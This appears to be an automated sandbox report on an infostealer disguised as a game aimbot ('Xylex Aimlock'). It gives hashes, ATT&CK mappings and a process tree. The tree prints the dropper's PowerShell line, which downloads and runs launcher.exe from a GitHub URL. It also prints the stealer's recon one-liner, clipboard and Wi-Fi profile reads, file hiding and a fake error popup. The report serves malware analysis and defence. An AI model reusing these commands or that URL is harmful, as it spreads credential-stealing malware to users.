dc27c8f9f692b5e118ed3151d587dfab9ae74942655b989f9f05718b80c3a2ca

Analysis

max time kernel
67s
max time network
69s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
10/05/2024, 14:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Xylex_Aimlock_V1.2.zip
Size

10.8MB
MD5

30549c95f6486f311969a41672ca7370
SHA1

0fe8e72c88efefb44d5863146ef0b57033950bd1
SHA256

dc27c8f9f692b5e118ed3151d587dfab9ae74942655b989f9f05718b80c3a2ca
SHA512

35cee882767ca0f269a80133882b3fda7d5aec507d4b60df4f3964424d0fe6527462bc69cfeb05022bda2eb19ebcd8812d3e1a9d649758f80610de66e69cf794
SSDEEP

196608:JVpn3Ng0xjefZjC7FidbT4GQeULIaMl7cBdPojBm/ZDMdLqwaXnjGOTSGv9Aoq:JVpO0xefZjyidbT4nIaMKBdAtmxDMp9N

Score

10^/10

evasion pyinstaller spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/ptsd9/script/releases/download/launcher/launcher.exe

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
56	4648	powershell.exe
58	4648	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4376	netsh.exe
3672	netsh.exe

Deletes itself 1 IoCs

pid	Process
4600	launcher.exe

Executes dropped EXE 4 IoCs

pid	Process
3784	launcher.exe
4600	launcher.exe
2304	launcher.exe
4892	launcher.exe

Loads dropped DLL 61 IoCs

pid	Process
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4600	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe
4892	launcher.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000002342c-74.dat	upx
behavioral1/memory/4600-78-0x00007FFFE9A80000-0x00007FFFEA067000-memory.dmp	upx
behavioral1/files/0x0007000000023426-85.dat	upx
behavioral1/memory/4600-88-0x00007FFFFFA70000-0x00007FFFFFA7F000-memory.dmp	upx
behavioral1/memory/4600-87-0x00007FFFFB810000-0x00007FFFFB834000-memory.dmp	upx
behavioral1/files/0x000700000002340f-84.dat	upx
behavioral1/files/0x0007000000023416-89.dat	upx
behavioral1/files/0x000700000002342d-91.dat	upx
behavioral1/memory/4600-94-0x00007FFFFCA10000-0x00007FFFFCA1D000-memory.dmp	upx
behavioral1/memory/4600-93-0x00007FFFEB500000-0x00007FFFEB519000-memory.dmp	upx
behavioral1/files/0x000700000002340d-96.dat	upx
behavioral1/memory/4600-98-0x00007FFFEB4E0000-0x00007FFFEB4F9000-memory.dmp	upx
behavioral1/files/0x0007000000023412-99.dat	upx
behavioral1/memory/4600-100-0x00007FFFEB4B0000-0x00007FFFEB4DD000-memory.dmp	upx
behavioral1/memory/4600-104-0x00007FFFEB480000-0x00007FFFEB4A3000-memory.dmp	upx
behavioral1/files/0x000700000002342e-105.dat	upx
behavioral1/memory/4600-106-0x00007FFFEB300000-0x00007FFFEB473000-memory.dmp	upx
behavioral1/files/0x0007000000023417-102.dat	upx
behavioral1/files/0x0007000000023418-107.dat	upx
behavioral1/files/0x0007000000023425-109.dat	upx
behavioral1/files/0x0007000000023427-110.dat	upx
behavioral1/memory/4600-112-0x00007FFFEB2D0000-0x00007FFFEB2FE000-memory.dmp	upx
behavioral1/memory/4600-113-0x00007FFFEB210000-0x00007FFFEB2C8000-memory.dmp	upx
behavioral1/files/0x000700000002340c-119.dat	upx
behavioral1/files/0x0007000000023414-122.dat	upx
behavioral1/files/0x0007000000023429-124.dat	upx
behavioral1/files/0x0007000000023411-126.dat	upx
behavioral1/memory/4600-133-0x00007FFFFB810000-0x00007FFFFB834000-memory.dmp	upx
behavioral1/files/0x0007000000023431-136.dat	upx
behavioral1/files/0x000700000002341b-137.dat	upx
behavioral1/files/0x000700000002341e-144.dat	upx
behavioral1/files/0x0007000000023424-148.dat	upx
behavioral1/memory/4600-156-0x00007FFFEB040000-0x00007FFFEB062000-memory.dmp	upx
behavioral1/memory/4600-155-0x00007FFFEA8D0000-0x00007FFFEA8EE000-memory.dmp	upx
behavioral1/files/0x0007000000023422-157.dat	upx
behavioral1/memory/4600-158-0x00007FFFEB500000-0x00007FFFEB519000-memory.dmp	upx
behavioral1/memory/4600-154-0x00007FFFFC8E0000-0x00007FFFFC8EA000-memory.dmp	upx
behavioral1/memory/4600-153-0x00007FFFEA8F0000-0x00007FFFEA901000-memory.dmp	upx
behavioral1/files/0x000700000002340e-160.dat	upx
behavioral1/memory/4600-161-0x00007FFFE8FB0000-0x00007FFFE96A4000-memory.dmp	upx
behavioral1/memory/4600-162-0x00007FFFE8F70000-0x00007FFFE8FA8000-memory.dmp	upx
behavioral1/memory/4600-152-0x00007FFFE96B0000-0x00007FFFE96FD000-memory.dmp	upx
behavioral1/memory/4600-151-0x00007FFFEAF50000-0x00007FFFEAF69000-memory.dmp	upx
behavioral1/memory/4600-150-0x00007FFFEB020000-0x00007FFFEB037000-memory.dmp	upx
behavioral1/files/0x0007000000023419-146.dat	upx
behavioral1/files/0x000700000002341c-142.dat	upx
behavioral1/files/0x000700000002341d-140.dat	upx
behavioral1/memory/4600-135-0x00007FFFEB070000-0x00007FFFEB18C000-memory.dmp	upx
behavioral1/memory/4600-132-0x00007FFFEB190000-0x00007FFFEB1A4000-memory.dmp	upx
behavioral1/memory/4600-131-0x00007FFFEB1B0000-0x00007FFFEB1C4000-memory.dmp	upx
behavioral1/memory/4600-130-0x00007FFFEB1D0000-0x00007FFFEB1E2000-memory.dmp	upx
behavioral1/memory/4600-129-0x00007FFFEB1F0000-0x00007FFFEB205000-memory.dmp	upx
behavioral1/files/0x000700000002342f-128.dat	upx
behavioral1/memory/4600-118-0x00007FFFE9700000-0x00007FFFE9A75000-memory.dmp	upx
behavioral1/memory/4600-116-0x00007FFFE9A80000-0x00007FFFEA067000-memory.dmp	upx
behavioral1/files/0x0007000000023415-209.dat	upx
behavioral1/memory/4600-211-0x00007FFFFC6B0000-0x00007FFFFC6BD000-memory.dmp	upx
behavioral1/memory/4600-210-0x00007FFFEB4B0000-0x00007FFFEB4DD000-memory.dmp	upx
behavioral1/memory/4600-226-0x00007FFFEB480000-0x00007FFFEB4A3000-memory.dmp	upx
behavioral1/memory/4600-227-0x00007FFFEB300000-0x00007FFFEB473000-memory.dmp	upx
behavioral1/memory/4600-228-0x00007FFFE9700000-0x00007FFFE9A75000-memory.dmp	upx
behavioral1/memory/4600-265-0x00007FFFEB2D0000-0x00007FFFEB2FE000-memory.dmp	upx
behavioral1/memory/4600-264-0x00007FFFFC6B0000-0x00007FFFFC6BD000-memory.dmp	upx
behavioral1/memory/4600-254-0x00007FFFEB070000-0x00007FFFEB18C000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
77	discord.com
69	discord.com
70	discord.com
71	discord.com
72	discord.com
73	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
61	ip-api.com

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4748	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0007000000023402-17.dat	pyinstaller

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
2856	WMIC.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4368	WMIC.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery

T1057

pid	Process
4956	tasklist.exe
1408	tasklist.exe
2988	tasklist.exe
4388	tasklist.exe
4740	tasklist.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1164	ipconfig.exe
2712	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1504	systeminfo.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4648	powershell.exe
4648	powershell.exe
4648	powershell.exe
1828	powershell.exe
1828	powershell.exe
1828	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeIncreaseQuotaPrivilege	4388	WMIC.exe
Token: SeSecurityPrivilege	4388	WMIC.exe
Token: SeTakeOwnershipPrivilege	4388	WMIC.exe
Token: SeLoadDriverPrivilege	4388	WMIC.exe
Token: SeSystemProfilePrivilege	4388	WMIC.exe
Token: SeSystemtimePrivilege	4388	WMIC.exe
Token: SeProfSingleProcessPrivilege	4388	WMIC.exe
Token: SeIncBasePriorityPrivilege	4388	WMIC.exe
Token: SeCreatePagefilePrivilege	4388	WMIC.exe
Token: SeBackupPrivilege	4388	WMIC.exe
Token: SeRestorePrivilege	4388	WMIC.exe
Token: SeShutdownPrivilege	4388	WMIC.exe
Token: SeDebugPrivilege	4388	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4388	WMIC.exe
Token: SeRemoteShutdownPrivilege	4388	WMIC.exe
Token: SeUndockPrivilege	4388	WMIC.exe
Token: SeManageVolumePrivilege	4388	WMIC.exe
Token: 33	4388	WMIC.exe
Token: 34	4388	WMIC.exe
Token: 35	4388	WMIC.exe
Token: 36	4388	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4368	WMIC.exe
Token: SeSecurityPrivilege	4368	WMIC.exe
Token: SeTakeOwnershipPrivilege	4368	WMIC.exe
Token: SeLoadDriverPrivilege	4368	WMIC.exe
Token: SeSystemProfilePrivilege	4368	WMIC.exe
Token: SeSystemtimePrivilege	4368	WMIC.exe
Token: SeProfSingleProcessPrivilege	4368	WMIC.exe
Token: SeIncBasePriorityPrivilege	4368	WMIC.exe
Token: SeCreatePagefilePrivilege	4368	WMIC.exe
Token: SeBackupPrivilege	4368	WMIC.exe
Token: SeRestorePrivilege	4368	WMIC.exe
Token: SeShutdownPrivilege	4368	WMIC.exe
Token: SeDebugPrivilege	4368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4368	WMIC.exe
Token: SeRemoteShutdownPrivilege	4368	WMIC.exe
Token: SeUndockPrivilege	4368	WMIC.exe
Token: SeManageVolumePrivilege	4368	WMIC.exe
Token: 33	4368	WMIC.exe
Token: 34	4368	WMIC.exe
Token: 35	4368	WMIC.exe
Token: 36	4368	WMIC.exe
Token: SeDebugPrivilege	4956	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4388	WMIC.exe
Token: SeSecurityPrivilege	4388	WMIC.exe
Token: SeTakeOwnershipPrivilege	4388	WMIC.exe
Token: SeLoadDriverPrivilege	4388	WMIC.exe
Token: SeSystemProfilePrivilege	4388	WMIC.exe
Token: SeSystemtimePrivilege	4388	WMIC.exe
Token: SeProfSingleProcessPrivilege	4388	WMIC.exe
Token: SeIncBasePriorityPrivilege	4388	WMIC.exe
Token: SeCreatePagefilePrivilege	4388	WMIC.exe
Token: SeBackupPrivilege	4388	WMIC.exe
Token: SeRestorePrivilege	4388	WMIC.exe
Token: SeShutdownPrivilege	4388	WMIC.exe
Token: SeDebugPrivilege	4388	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4388	WMIC.exe
Token: SeRemoteShutdownPrivilege	4388	WMIC.exe
Token: SeUndockPrivilege	4388	WMIC.exe
Token: SeManageVolumePrivilege	4388	WMIC.exe
Token: 33	4388	WMIC.exe
Token: 34	4388	WMIC.exe
Token: 35	4388	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 964 wrote to memory of 4648	964	cmd.exe	105
PID 964 wrote to memory of 4648	964	cmd.exe	105
PID 4648 wrote to memory of 3784	4648	powershell.exe	106
PID 4648 wrote to memory of 3784	4648	powershell.exe	106
PID 3784 wrote to memory of 4600	3784	launcher.exe	107
PID 3784 wrote to memory of 4600	3784	launcher.exe	107
PID 4600 wrote to memory of 3676	4600	launcher.exe	108
PID 4600 wrote to memory of 3676	4600	launcher.exe	108
PID 4600 wrote to memory of 3024	4600	launcher.exe	110
PID 4600 wrote to memory of 3024	4600	launcher.exe	110
PID 4600 wrote to memory of 3128	4600	launcher.exe	156
PID 4600 wrote to memory of 3128	4600	launcher.exe	156
PID 4600 wrote to memory of 2092	4600	launcher.exe	145
PID 4600 wrote to memory of 2092	4600	launcher.exe	145
PID 4600 wrote to memory of 4380	4600	launcher.exe	113
PID 4600 wrote to memory of 4380	4600	launcher.exe	113
PID 3128 wrote to memory of 4388	3128	cmd.exe	149
PID 3128 wrote to memory of 4388	3128	cmd.exe	149
PID 3024 wrote to memory of 4368	3024	cmd.exe	119
PID 3024 wrote to memory of 4368	3024	cmd.exe	119
PID 4380 wrote to memory of 4956	4380	cmd.exe	120
PID 4380 wrote to memory of 4956	4380	cmd.exe	120
PID 4600 wrote to memory of 4944	4600	launcher.exe	121
PID 4600 wrote to memory of 4944	4600	launcher.exe	121
PID 4944 wrote to memory of 3668	4944	cmd.exe	123
PID 4944 wrote to memory of 3668	4944	cmd.exe	123
PID 4600 wrote to memory of 1504	4600	launcher.exe	158
PID 4600 wrote to memory of 1504	4600	launcher.exe	158
PID 4600 wrote to memory of 4076	4600	launcher.exe	125
PID 4600 wrote to memory of 4076	4600	launcher.exe	125
PID 4076 wrote to memory of 1408	4076	cmd.exe	128
PID 4076 wrote to memory of 1408	4076	cmd.exe	128
PID 1504 wrote to memory of 2064	1504	cmd.exe	129
PID 1504 wrote to memory of 2064	1504	cmd.exe	129
PID 4600 wrote to memory of 964	4600	launcher.exe	130
PID 4600 wrote to memory of 964	4600	launcher.exe	130
PID 964 wrote to memory of 4724	964	cmd.exe	132
PID 964 wrote to memory of 4724	964	cmd.exe	132
PID 4600 wrote to memory of 3520	4600	launcher.exe	133
PID 4600 wrote to memory of 3520	4600	launcher.exe	133
PID 4600 wrote to memory of 2836	4600	launcher.exe	134
PID 4600 wrote to memory of 2836	4600	launcher.exe	134
PID 2836 wrote to memory of 2988	2836	cmd.exe	137
PID 2836 wrote to memory of 2988	2836	cmd.exe	137
PID 3520 wrote to memory of 2504	3520	cmd.exe	138
PID 3520 wrote to memory of 2504	3520	cmd.exe	138
PID 4600 wrote to memory of 4376	4600	launcher.exe	139
PID 4600 wrote to memory of 4376	4600	launcher.exe	139
PID 4600 wrote to memory of 2232	4600	launcher.exe	140
PID 4600 wrote to memory of 2232	4600	launcher.exe	140
PID 4600 wrote to memory of 5044	4600	launcher.exe	141
PID 4600 wrote to memory of 5044	4600	launcher.exe	141
PID 4600 wrote to memory of 3400	4600	launcher.exe	142
PID 4600 wrote to memory of 3400	4600	launcher.exe	142
PID 4376 wrote to memory of 1940	4376	cmd.exe	147
PID 4376 wrote to memory of 1940	4376	cmd.exe	147
PID 1940 wrote to memory of 820	1940	cmd.exe	148
PID 1940 wrote to memory of 820	1940	cmd.exe	148
PID 5044 wrote to memory of 4388	5044	cmd.exe	149
PID 5044 wrote to memory of 4388	5044	cmd.exe	149
PID 2232 wrote to memory of 5020	2232	cmd.exe	150
PID 2232 wrote to memory of 5020	2232	cmd.exe	150
PID 3400 wrote to memory of 1828	3400	cmd.exe	151
PID 3400 wrote to memory of 1828	3400	cmd.exe	151

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4724	attrib.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Xylex_Aimlock_V1.2.zip
1⤵
PID:2244

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Xylex Aimlock\Xylex Aimlock - V1.2.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell $down=New-Object System.Net.WebClient;$url='https://github.com/ptsd9/script/releases/download/launcher/launcher.exe';$file='launcher.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4648
- - C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe
    "C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3784
  - - C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe
      "C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe"
      4⤵
      Deletes itself
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:4600
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:3676
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3024
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:4368
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3128
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4388
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        5⤵
        
        PID:2092
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4380
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4956
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4944
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        6⤵
        
        PID:3668
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1504
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:2064
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4076
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:1408
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:964
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
        6⤵
        Views/modifies file attributes
        
        PID:4724
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3520
      - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
        6⤵
        
        PID:2504
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2836
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:2988
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4376
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1940
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:820
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2232
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        6⤵
        
        PID:5020
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:1164
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5044
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2092
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:4388
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3400
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1828
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        
        PID:3752
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        
        PID:1896
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        5⤵
        
        PID:3068
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3128
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:1504
      - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        6⤵
        
        PID:1304
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        6⤵
        Collects information from the system
        
        PID:2856
      - C:\Windows\system32\net.exe
        
        net user
        6⤵
        
        PID:548
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        7⤵
        
        PID:2116
      - C:\Windows\system32\query.exe
        
        query user
        6⤵
        
        PID:708
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        7⤵
        
        PID:2192
      - C:\Windows\system32\net.exe
        
        net localgroup
        6⤵
        
        PID:1884
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        7⤵
        
        PID:3900
      - C:\Windows\system32\net.exe
        
        net localgroup administrators
        6⤵
        
        PID:4892
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        7⤵
        
        PID:3960
      - C:\Windows\system32\net.exe
        
        net user guest
        6⤵
        
        PID:4364
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        7⤵
        
        PID:2844
      - C:\Windows\system32\net.exe
        
        net user administrator
        6⤵
        
        PID:4344
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        7⤵
        
        PID:4456
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        6⤵
        
        PID:2860
      - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        6⤵
        Enumerates processes with tasklist
        
        PID:4740
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        6⤵
        Gathers network information
        
        PID:1164
      - C:\Windows\system32\ROUTE.EXE
        
        route print
        6⤵
        
        PID:968
      - C:\Windows\system32\ARP.EXE
        
        arp -a
        6⤵
        
        PID:1792
      - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        6⤵
        Gathers network information
        
        PID:2712
      - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        6⤵
        Launches sc.exe
        
        PID:4748
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        6⤵
        Modifies Windows Firewall
        
        PID:4376
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        6⤵
        Modifies Windows Firewall
        
        PID:3672
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:2044
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:984
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:3136
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:4516

C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe
"C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe"
1⤵
- Executes dropped EXE
PID:2304
- C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe
  "C:\Users\Admin\Desktop\Xylex Aimlock\bin\launcher.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ver"
    3⤵
    PID:1868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI37842\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37842\_asyncio.pyd

Filesize
34KB

MD5
7aba633225a9efe918d40c803f580a86

SHA1
